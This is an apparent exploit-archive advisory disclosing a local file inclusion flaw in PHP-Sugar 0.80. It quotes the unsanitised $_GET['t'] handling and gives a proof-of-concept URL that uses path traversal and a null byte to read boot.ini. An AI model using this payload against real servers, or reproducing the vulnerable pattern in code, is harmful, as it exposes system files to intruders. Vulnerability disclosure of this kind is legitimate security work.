[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP-Sugar 0.80 (index.php t) Local File Inclusion Vulnerability
# Published : 2009-06-29
# Author : ahmadbady
# Previous Title : Almnzm (COOKIE: customer) Remote SQL Injection Vulnerability
# Next Title : Clicknet CMS 2.1 (side) Arbitrary File Disclosure Vulnlerability


=-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-
script: PHP-Sugar 0.80
-----------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://php-sugar.net/files/?mod=files

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
if (isset($_GET['t']))
	$file = $_GET['t'];
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
xpl:
/path/test/index.php?t=..//..//..//..//..//boot.ini%00
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-

# www.Syue.com [2009-06-29]